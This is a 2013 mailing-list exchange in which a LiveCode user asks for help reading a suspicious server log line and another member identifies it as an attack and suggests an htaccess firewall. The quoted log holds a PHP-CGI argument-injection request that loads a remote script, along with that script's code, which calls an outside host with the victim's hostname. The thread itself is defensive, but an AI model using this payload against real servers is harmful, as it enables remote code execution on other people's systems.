Hi Thierry,

i am not an php expert, but it seems that someone tried to execute a remote php 
script on your server by adding some parameters to your index.php. But as i 
said, i am not an expert. But it was definitely an attack. 
There is a free htaccess firewall available at 

http://perishablepress.com/5g-blacklist-2012/

I do not know if the firewall stops that attack but it is a really useful 
protection for your server.

Regards,

Matthias


Am 24.05.2013 um 11:16 schrieb Thierry Douez <th.do...@gmail.com>:

> Hi,
> 
> Can someone could help me to understand one of my server log?
> 
> 
> Here is the line:
> 
> 193.107.17.36 ... "GET
> /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
> gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"
> 
> The file ../rf/s.txt  contains:
> 
> <?php file_get_contents('
> http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0); ?>
> 
> The IP point in the middle of nowhere in Russia.
> 
> and finally I know nothing about php.
> 
> Thanks for any hints,
> 
> Regards,
> 
> Thierry
> 
> ------------------------------------------------
> Thierry Douez - http://sunny-tdz.com
> Maker of sunnYperl - sunnYmidi - sunnYmage
> _______________________________________________
> use-livecode mailing list
> use-livecode@lists.runrev.com
> Please visit this url to subscribe, unsubscribe and manage your subscription 
> preferences:
> http://lists.runrev.com/mailman/listinfo/use-livecode


_______________________________________________
use-livecode mailing list
use-livecode@lists.runrev.com
Please visit this url to subscribe, unsubscribe and manage your subscription 
preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

Reply via email to